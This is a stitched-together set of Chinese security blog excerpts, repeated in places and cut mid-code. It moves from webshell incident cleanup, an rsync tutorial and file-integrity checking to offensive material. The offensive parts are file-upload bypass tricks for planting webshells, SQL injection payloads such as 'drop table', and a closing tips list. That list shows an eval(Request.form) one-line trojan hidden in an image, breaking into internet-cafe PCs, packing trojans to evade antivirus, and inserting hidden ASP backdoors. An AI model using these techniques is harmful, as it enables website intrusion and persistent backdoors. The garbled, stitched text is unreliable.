webshell

某天，正安逸地划水，突然收到情报，公司某网站被黑了。惊得我一跳，这可不是一件小事 一、安全排查 赶紧搜索了一下网站关键词，标题已经被篡改了 点进去，加载缓慢，并自动跳转到了某博彩网站 查看网站源代码，可以看到有多处异常 在线编码转换，对应上了被篡改的内容 关系到公司形象，事态危急，需要赶紧联系资产管理员进行恢复 经过了解这个项目上线后就没有再进行过更新，事实上已经没有人维护了 通过管理员登录到windows应用服务器后，把网站项目文件下载到本地进行Webshell查杀，发现被植入大量木马后门 对系统进行杀毒扫描，暂未发现问题 查看系统日志，有暴力登录的行为 查看登录记录详细信息，发现诸多高危IP nmap发现开放过多端口，其中不乏高危端口 排查网络连接、进程等暂未发现问题，就不详述了 二、网站恢复 1）在主机防火墙入站规则上关闭与业务无关端口 2）因为之前网站项目文件做过备份，webshell扫描没有问题后直接替换掉现在文件 3）网站已经恢复，但在搜索引擎上看到的仍然是之前被篡改的标题，点进去网站是正常的，但搜索结果上展示的还是之前的快照内容，可以通过投诉快照（百度投诉快照服务暂停维护）进行更新 4）安装主机防护终端，对入侵行为进行告警和阻断 来源： oschina 链接： https://my.oschina.net/u/4264305/blog/3689325

某天，正安逸地划水，突然收到情报，公司某网站被黑了。惊得我一跳，这可不是一件小事 一、安全排查 赶紧搜索了一下网站关键词，标题已经被篡改了 点进去，加载缓慢，并自动跳转到了某博彩网站 查看网站源代码，可以看到有多处异常 在线编码转换，对应上了被篡改的内容 关系到公司形象，事态危急，需要赶紧联系资产管理员进行恢复 经过了解这个项目上线后就没有再进行过更新，事实上已经没有人维护了 通过管理员登录到windows应用服务器后，把网站项目文件下载到本地进行Webshell查杀，发现被植入大量木马后门 对系统进行杀毒扫描，暂未发现问题 查看系统日志，有暴力登录的行为 查看登录记录详细信息，发现诸多高危IP nmap发现开放过多端口，其中不乏高危端口 排查网络连接、进程等暂未发现问题，就不详述了 二、网站恢复 1）在主机防火墙入站规则上关闭与业务无关端口 2）因为之前网站项目文件做过备份，webshell扫描没有问题后直接替换掉现在文件 3）网站已经恢复，但在搜索引擎上看到的仍然是之前被篡改的标题，点进去网站是正常的，但搜索结果上展示的还是之前的快照内容，可以通过投诉快照（百度投诉快照服务暂停维护）进行更新 4）安装主机防护终端，对入侵行为进行告警和阻断 来源： oschina 链接： https://my.oschina.net/u/4353583/blog/3652037

0x01 测试环境 CentOS 7.4 Rsync服务端： 192.168 . 204.130 CentOS 7.4 Rsync客户端： 192.168 . 204.168 0x02 rsync同步方式 第一种方式：rsync通过ssh方式同步 1、Rsync服务端和客户端都需要安装rsync [root@localhost ~]# yum -y install rsync 2、使用 前提：需知道远程服务器开启ssh端口和账号密码 A、推文件： [root@localhost tmp]# rsync -av /etc/passwd 192.168 . 204.168 :/tmp/passwd.txt B、拉文件 [root@localhost tmp]# rsync -av 192.168 . 204.168 :/tmp/passwd.txt /tmp/test.txt #指定ssh端口 [root@localhost tmp]# rsync -av -e " ssh -p 22 " 192.168 . 204.168 :/tmp/passwd.txt /tmp/a.txt 第二种方式：rsync通过服务的方式同步 服务端配置： 1、编辑配置文件/etc/rsyncd.conf motd file = /etc/ rsyncd.motd transfer logging =

【今日推荐】：为什么一到面试就懵逼！>>> 试想一下，如果你的网站被入侵，攻击者留下隐藏的后门，你真的都可以找出来嘛？面对一个大中型的应用系统，数以百万级的代码行，是不可能做到每个文件每段代码进行手工检查的。 即使是一款拥有99.9%的Webshell检出率的检测引擎，依然可能存在Webshell绕过的情况 。另外，像暗链、网页劫持、页面跳转等常见的黑帽SEO手法，也很难通过手动检测或工具检测全部识别出来。 最好的方式就是做文件完整性验证。通过与原始代码对比，可以快速发现文件是否被篡改以及被篡改的位置。当然，第一个前提是，你所在的团队已具备代码版本管理的能力，如果你是个人站长，相信你已经备份了原始代码。 本文将结合实际应用，介绍几种文件完整性验证方式，可以帮助你找出代码中所有隐藏的后门。 1、文件MD5校验 下载D盾_Web查杀工具的时候，我们可以留意到下载的压缩包里，除了有一个exe可执行文件，还有一个文件md5值。这个是软件作者在发布软件时，通过md5算法计算出该exe文件的“特征值”。 下载地址：http://www.d99net.net/down/WebShellKill_V2.0.9.zip 文件MD5：29285decadbce3918a4f8429ec33df46 WebShellKill.exe 当用户下载软件时，可以使用相同的校验算法计算下载到exe文件的特征值

文件上传获取webshell 直接上传获取webshell 服务器没有进行安全验证就直接对文件上传成功，可直接上传脚本利用。 绕过上传类型 获取webshell 现在很多的脚本程序上传模块不是只允许上传合法文件类型，而大多数的系统是允许添加上传类型，bbsxp后台可以添加asa|asP类 型，ewebeditor的后台也可添加asa类型，通过修改后我们可以直接上传asa后缀的webshell了，还有一种情况是过滤了。asp，可以添 加。aspasp的文件类型来上传获得webshell.php系统的后台，我们可以添加。php.g1f的上传类型，这是php的一个特性，最后的哪个 只要不是已知的文件类型即可，php会将php.g1f作为。php来正常运行，从而也可成功拿到shell.LeadBbs3.14后台获得 webshell方法是：在上传类型中增加asp ，注意，asp后面是有个空格的，然后在前台上传ASP马，当然也要在后面加个空格！可配合解析漏洞等进行绕过。 绕过请求头检测获取webshell 绕过Content-Type检测文件类型上传WebShell，将Content-Type其类型改为图片类型：image/jpeg，可绕过检测成功上传 利用后台上传webshell 利用后台管理功能写入webshell 上传漏洞基本上补的也差不多了

引言  一波未平，一波又起。金融公司的业务实在是太引人耳目，何况我们公司的业处正处于风口之上（区块链金融），并且每天有大量现金交易，所以不知道有多少 躲在暗处一直在盯着你的系统，让你防不胜防，并且想方设法的找到突破点，以达到 的目的来获取非法利益。 俗话说：“道高一尺，魔高一丈”。系统和代码也可以这么理解，防的在好，总有漏洞。系统和代码也没有绝对的安全。该来的总会来...... sql注入与“她”相遇 某一天，天气晴朗，心情舒畅。“她”来了，打破了笔者的美好时光。下午2点多钟，笔者和朋友在苏州街的天使汇二楼极客咖啡参加某个云厂商的Kubernetes一场技术沙龙，正听得兴致勃勃的时候，笔者的公司群里有个php开发突然帖出一张图：  这个时候，群里翻腾了。没错，被SQL注入了，数据库的表被注入了字段，并且经检查后，发现这个库中的大部分表都被注入了这个字段。我的电脑没带在身边，真是着急，马上跟总监说明问题严重性。由于我电脑不在身边， 只能把数据库账号授权（读写权限）给那个php开发，让他检查所有的表，把被注入的字段删除掉。并查看数据和其它表有没有被修改。好在发现急时，数据和业务都没有被丢失和损坏。  这里我要说明一下，我们的业务都在阿里云，项目是以php为主，并且开通了waf防火墙，只是waf上的防护措施比较宽松。笔者在安全方面的经验也比较欠缺，好在开通了阿里云的WAF

3 月，跳不动了？>>> 某一客户单位的网站首页被篡改，并收到网监的通知说是网站有漏洞，接到上级部门的信息安全整改通报，贵单位网站被植入木马文件，导致网站首页篡改跳转到caipiao网站，根据中华人民共和国计算机信息系统安全保护条例以及信息安全等级保护管理办法的规定，请贵单位尽快对网站漏洞进行修复，核实网站发生的实际安全问题，对发生的问题进行全面的整改与处理，避免网站事态扩大。我们SINE安全公司第一时间应急响应处理，对客户的网站进行安全检测，消除网站安全隐患。 信息安全整改通知书 贵单位，经过信息安全部安全检查及上级部门反馈情况，你院存在以下安全隐患： 事件类型：网站漏洞--SQL注入漏洞 事件URL：//******.cn/search.php?a= 发生时间：2019-02-28 要求整改完成时间：2019-03-06 事件描述:SQL注入漏洞,恶意攻击者可以利用SQL注入漏洞，获取网站数据库中的所有信息，包 括管理员账号密码，造成网站敏感数据信息泄露.网站被篡改。 事件截图: 请贵单位接到网站安全整改通知书后立即整改，并将整改情况以书面形式上报，截止日期为2019年03月06日。在整改期间你院应当采取应急措施，防止发生网站安全事件。 收到信息安全整改通知后，我们SINE安全跟客户对接了相关的网站信息，包括网站的FTP账号密码，以及服务器IP，账号密码

3 月，跳不动了？>>> 1、注入 SQL注入：程序向后台数据库传递SQL时，用户提交的数据直接拼接到SQL语句中并执行，从而导入SQL注入攻击。 字符型注入：黑色部分为拼接的问题参数 select * from t_user where name='test' or '1' = '1'; 数字型注入：黑色部分为拼接的问题参数(对于强类型语言，字符串转int类型会抛异常。所以这种注入方式一般出现在php等弱类型语言上。 select * from t_user where id=1；drop table t_userinfo; 搜索型注入：对表名进行猜测 select * from t_user where userName like ‘%test%' and 1=2 union select 1,2 from t_admin'; 修复方法： a、在mybatis中使用#把参数当做一个字符串，不能使用$符号 b、在JDBC中使用预编译的方式对参数进行绑定，详细如下： String userName = request.getParameter("userName"); String sql = "select * from t_user where userName = ?"; JdbcConnection conn = new JdbcConnection();

3 月，跳不动了？>>> 今年2020年3月20号，我们公司的国外网址在google adwords上线广告的时候，突然被提示拒登：恶意软件或垃圾软件，导致公司在网络营销上损失较大，每天都投入上百美元的广告费用也都暂停了，没有了国外客户的咨询，本身疫情带来的损失就很大，无奈我对网站又不懂，随即打了电话给谷歌客服。我们把大体情况介绍了一下。 我们从去年就开始做谷歌广告了，找了专业的adwords优化技术对其进行投放广告，以及关键词的优化，都稳定1年了，突然间网站莫名的无法上广告，广告被拒登，然后客服说，请提供下网站域名，我们也给他了，挂了电话大约过了1个小时，通过邮件回复了我们，具体邮件如下图： 尊敬的广告客户： 你好，感谢您的联系。 如先前在电话中的沟通，以下是我们通过检测您的网站http://www.***.com所发现的被感染的恶意链接的页面，请您查看： 1、受感染的URL：http://www.***.com/pal-quare-e;ectric.html 恶意链接：http://www.iyferr.com/px.js,http://www.iyferr.com/px.js,http://www.iyferr.com/sk-logabpstatus.php,请联系您的技术人员对其进行清除，清除之后，系统会在72小时之内自动扫描您的网站，若无问题，便会将其恢复

建一个asp文件，内容为 <!--＃i nclude file="ating.jpg"--> 找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索%和％,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT> 2. 名称：整蛊网吧 先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享，复制一个木马过去运行即可。 3．名称：感受MD5暴力破解的魅力 rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all" 1和7代表密码最小和最大长度 阿汀我再加个方法：http://md5.rednoize.com/ 在线破解 或者到http://www.md5lookup.com/?category=01-3&searck=on 4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳的时候最好多选择不知名的加壳软件。 5．名称：隐蔽的插入型ASP木马 (1)在我们要做手脚的asp文件里加入如下内容 <%if